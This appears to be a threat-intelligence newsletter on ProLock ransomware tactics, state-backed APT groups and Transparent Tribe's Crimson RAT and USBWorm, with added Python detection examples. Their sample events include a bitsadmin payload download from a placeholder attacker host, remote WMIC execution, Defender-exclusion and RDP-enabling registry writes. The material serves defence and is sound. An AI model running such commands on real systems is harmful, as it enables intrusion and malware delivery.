ProLock Ransomware 🔓 Unlocked

The ProLock ransomware operators were able to deploy a large number of attacks over the past six months using a standard operating tactic, averaging close to one target every day.

The operation started in late 2019 under the name PwndLocker. After a crypto bug allowed victims to unlock their files for free, the operators fixed the flaw, renamed the malware to ProLock, and rebooted the operation.

A fresh start in March under the ProLock label also meant increased activity and larger ransoms. Since then, the average ransom figure has swelled to $1.8 million.

Simple operation

The threat actor has no preference for particular targets or sectors, as long as they are companies with big networks that are able to pay a higher ransom. The focus seems to be on businesses in Europe and North America.

The group’s tactics, techniques, and procedures are simple and effective: the partnership with the QakBot (QBot) banking trojan allows them to map the network, move laterally, and ultimately deploy the ransomware.

Between the initial compromise and running the file-encryption routine, the actor spends about a month on the network, gathering information for better targeting and exfiltrating data (via Rclone).

Running ProLock on the target network is the last step of the attack, which typically starts with a spear-phishing email carrying weaponized VBScripts and Office documents that deliver QakBot, oftentimes via replies in hijacked email threads.

Once on the target host, QakBot establishes persistence and keeps active defenses from spotting it by modifying the Windows Registry to add its binaries to the list of Windows Defender exclusions.

“QakBot also collects a lot of information about the infected host, including the IP address, hostname, domain, and list of installed programs. The threat actor acquires a basic understanding of the network and can plan post-exploitation activities.”

With tools like Bloodhound and ADFind, the threat actor profiles the environment to distribute the banking trojan to other hosts on the network. In some cases, this was done manually using PsExec, suggesting a strong connection between ProLock and QakBot operators.

Moving laterally also involved the use of Remote Desktop (RDP), and when this was not available on a machine, the actor ran the following batch script via PsExec to enable the remote connection:

ProLock’s toolkit includes Mimikatz, a post-exploitation tool built for penetration testers, which is deployed through Cobalt Strike, a framework built for red team engagements.

The ransomware actor sometimes relies on a vulnerability in Windows (CVE-2019-0859) that enables them to escalate privileges on compromised systems.

The file-encrypting malware lands on the host either via QakBot, downloaded with the Background Intelligent Transfer Service (BITS) from the attacker’s server, or by executing a script on a remote host using the Windows Management Instrumentation command-line tool (WMIC).
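The three points above where this chain touches a host (the Defender exclusion written to the registry, the registry value flipped to enable RDP, and the BITS download / WMIC remote execution / PsExec service) are all visible in ordinary endpoint telemetry. The Python below is an added example, not code from the original write-up or from any vendor: it runs a handful of detection rules over constructed, Sysmon-style event lines. The `key=value` line format, the sample paths, the hostname `FILESRV01`, the domain `attacker.invalid` and the rule names are all assumptions made for this example.

```python
import re

# Constructed sample events in a simplified key=value format modelled on Sysmon
# Event ID 1 (process create) and Event ID 13 (registry value set).
# Hostnames, paths and URLs are made up for this example.
SAMPLE_EVENTS = [
    # Defender exclusion added for a directory (loader stage)
    r"EventID=13 Image=C:\Windows\regedit.exe TargetObject=HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\qb Details=DWORD (0x00000000)",
    # RDP enabled by setting fDenyTSConnections to 0 (lateral-movement stage)
    r"EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections Details=DWORD (0x00000000)",
    # Same value set back to 1 (RDP disabled again): must not fire
    r"EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections Details=DWORD (0x00000001)",
    # BITS used to fetch a payload from the operator's server
    r"EventID=1 Image=C:\Windows\System32\bitsadmin.exe CommandLine=bitsadmin /transfer upd /download /priority high http://attacker.invalid/p.exe C:\Users\Public\p.exe",
    # WMIC creating a process on a remote host
    r"EventID=1 Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic /node:FILESRV01 process call create C:\Windows\Temp\run.bat",
    # PsExec service binary running on the remote side
    r"EventID=1 Image=C:\Windows\PSEXESVC.exe CommandLine=C:\Windows\PSEXESVC.exe",
    # Benign activity that should not fire
    r"EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe C:\Users\alice\notes.txt",
    r"EventID=13 Image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE TargetObject=HKCU\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems\xyz Details=Binary Data",
]

# Field values may contain spaces, so a value runs until the next " Name=" token
# or the end of the line.
_FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line: str) -> dict:
    """Turn one key=value event line into a dict of field -> value."""
    return dict(_FIELD_RE.findall(line))


def _field_matches(field: str, pattern: str):
    """Build a predicate that regex-searches one event field, case-insensitively."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda ev: bool(rx.search(ev.get(field, "")))


# Rule names are this example's own labels, not an existing rule set.
RULES = {
    # Any write under the Defender exclusion lists (including the Policies hive)
    "defender_exclusion_added": _field_matches(
        "TargetObject", r"\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\"),
    # fDenyTSConnections written as 0: RDP turned on; a write of 1 is ignored
    "rdp_enabled_via_registry": lambda ev: (
        "\\Terminal Server\\fDenyTSConnections" in ev.get("TargetObject", "")
        and ev.get("Details", "").endswith("(0x00000000)")),
    # bitsadmin used as a downloader
    "bits_download": _field_matches(
        "CommandLine", r"\bbitsadmin(\.exe)?\b.*/transfer\b.*/download\b"),
    # wmic targeting another host and creating a process there
    "wmic_remote_process_create": _field_matches(
        "CommandLine", r"\bwmic(\.exe)?\b.*/node:.*\bprocess\s+call\s+create\b"),
    # PsExec client or its service-side binary as the executing image
    "psexec_service": _field_matches("Image", r"\\psexe(c|svc)(64)?\.exe$"),
}


def scan_events(lines) -> list:
    """Return (EventID, rule_name) for every event that trips a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        for name, predicate in RULES.items():
            if predicate(ev):
                hits.append((ev.get("EventID"), name))
    return hits


if __name__ == "__main__":
    for event_id, rule in scan_events(SAMPLE_EVENTS):
        print(f"EventID {event_id}: {rule}")
```

The rules deliberately key on the registry paths and command-line shapes rather than on file hashes, because the write-up's point is that the tooling is standard and the binaries are legitimate; what is abnormal is a non-administrative process writing exclusions, RDP being switched on from the command line, and BITS or WMIC being driven interactively.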

Despite using standard tools, ProLock attacks remain largely undetected on the network, giving them time to prepare the file encryption stage and steal data.

Sophisticated APT attacks in the limelight

Many Advanced Persistent Threat (APT) groups receive guidance and support from established nation-states. Unlike most threat actors, APT attackers chase their goals for months or even years with a clear objective in mind.

Sponsored by countries

  • State-sponsored APT groups are organizations that conduct attacks on a country’s information assets related to national security or economic importance, by means of cyberespionage or cyber sabotage.
  • While China and Russia stand atop the list of nations linked to the most sophisticated state-sponsored hacking groups, the number of government-linked cyberespionage campaigns from other countries has started to burgeon in recent years.

Current APT attacks

  • The China-based APT group CactusPete is targeting military and financial organizations in Eastern Europe with a new attack campaign. The group is employing a new variant of the Bisonal backdoor to steal information, move laterally inside a network, and execute code on target machines.
  • A Russian-speaking hacking group, RedCurl, has conducted 26 corporate espionage attacks since 2018, attempting to steal confidential corporate information from victims in the finance, construction, law, retail, and other sectors.
  • The “Operation Skeleton Key” attacks were performed by a Chinese APT group, Chimera, against numerous semiconductor vendors in Taiwan. The hackers are known to abuse Cobalt Strike, a penetration testing tool, and a custom skeleton key obtained by modifying the code of Dumpert and Mimikatz.
  • Fox Kitten (aka Parisite), a group of Iranian government-backed hackers, has been detected attacking the private and government sectors in the U.S. The threat actors operate by targeting high-end and high-priced network equipment using exploits for newly disclosed vulnerabilities.

The crucial role of global vigilance

From a global standpoint, visibility into these APT groups is getting better, which is good news. Thanks to coordinated information-sharing worldwide, countries and businesses are aware of the rising APT activity and are taking it seriously.

The information security community has started collaborating and sharing observed Tactics, Techniques, and Procedures (TTPs). This cooperation is needed to alleviate growing threats.

Transparent Tribe ⛓️ Espionage on Governments

A recent espionage campaign is targeting government authorities in India, Afghanistan, and other Asian countries. The group behind it, named Transparent Tribe and also called ProjectM, has been in operation since 2013.

Transparent Tribe is focused on surveillance and spying, and to accomplish these ends, the group is constantly evolving its toolkit depending on the intended target.

The attack chain starts off in a typical way, via spear-phishing emails. Fraudulent messages are sent with malicious Microsoft Office documents containing an embedded macro that deploys the group’s main payload, the Crimson Remote Access Trojan (RAT).

If a victim falls for the scheme and enables macros, the custom .NET Trojan launches and performs a variety of functions, including connecting to a command-and-control (C2) server for data exfiltration and remote malware updates, stealing files, capturing screenshots, and compromising microphones and webcams for audio and video surveillance.

The Trojan is also able to steal files from removable media, log keystrokes, and harvest credentials stored in browsers.

The Trojan comes in two versions, compiled across 2017, 2018, and the end of 2019, suggesting the malware is still in active development.

Transparent Tribe also makes use of other .NET malware and a Python-based Trojan called Peppy, but a new USB attack tool is of particular interest.

USBWorm is made up of two main components, a file stealer for removable drives and a worm feature for jumping to new, vulnerable machines.

If a USB drive is connected to an infected PC, a copy of the Trojan is quietly installed on the removable drive. The malware lists all directories on the drive and then buries a copy of the Trojan in the drive’s root directory. The directory attribute is then changed to “hidden”, and a fake Windows directory icon is used to lure victims into clicking on and executing the payload when they attempt to access their directories.

“This results in all the actual directories being hidden and replaced with a copy of the malware using the same directory name.”
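The lure pattern just described leaves a simple footprint on the drive: for each real directory there is a sibling executable with the same base name. As an added example that is not part of the original post and not Transparent Tribe or USBWorm code, the Python below walks the root of a removable drive, pairs each directory with any same-named executable beside it, and reports whether the directory carries the hidden attribute. The `build_demo_drive` helper constructs a throwaway folder that mimics an infected drive; its directory names, the `.exe` lure names and the two-byte fake header are all made up for the example.

```python
import os
import stat
import tempfile
from pathlib import Path

# Extensions a "folder" lure is likely to carry. Explorer hides known extensions by
# default, so "Documents.exe" with a folder icon reads simply as "Documents".
LURE_EXTENSIONS = (".exe", ".scr", ".pif", ".com")

# FILE_ATTRIBUTE_HIDDEN is 0x2 on Windows; fall back to the literal elsewhere.
FILE_ATTRIBUTE_HIDDEN = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2)


def is_hidden(path: Path) -> bool:
    """Windows reports the HIDDEN attribute in st_file_attributes; other
    platforms lack that field, so fall back to the dot-prefix convention."""
    attrs = getattr(path.stat(), "st_file_attributes", 0)
    return bool(attrs & FILE_ATTRIBUTE_HIDDEN) or path.name.startswith(".")


def find_folder_lures(drive_root) -> list:
    """Return one finding per directory in drive_root that has a sibling
    executable with the same base name (the USBWorm replacement pattern)."""
    root = Path(drive_root)
    findings = []
    for entry in sorted(root.iterdir()):
        if not entry.is_dir():
            continue
        for ext in LURE_EXTENSIONS:
            lure = root / (entry.name + ext)
            if lure.is_file():
                findings.append({
                    "directory": entry.name,
                    "lure": lure.name,
                    "directory_hidden": is_hidden(entry),
                    "lure_size": lure.stat().st_size,
                })
    return findings


def build_demo_drive() -> str:
    """Construct a temporary directory that mimics an infected removable drive.
    Everything in it is made up for this example."""
    root = tempfile.mkdtemp(prefix="usb_demo_")
    for name in ("Documents", "Photos", "Tools"):
        os.mkdir(os.path.join(root, name))
    # Two directories get a same-named lure executable beside them; Tools does not.
    for name in ("Documents", "Photos"):
        with open(os.path.join(root, name + ".exe"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 62)  # constructed 64-byte stand-in for a PE file
    with open(os.path.join(root, "README.txt"), "w") as f:
        f.write("benign file\n")
    return root


if __name__ == "__main__":
    demo = build_demo_drive()
    for finding in find_folder_lures(demo):
        print(finding)
```

On a real Windows drive the `directory_hidden` flag is the second half of the indicator: a directory that is both hidden and shadowed by a same-named executable is exactly the state the quoted description leaves behind. On a non-Windows host (where the demo in `__main__` runs), the attribute is not available and the name match alone is reported.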

Over 200 samples of Transparent Tribe Crimson components were detected between June 2019 and June 2020. “We don’t expect any slowdown from this group in the near future.”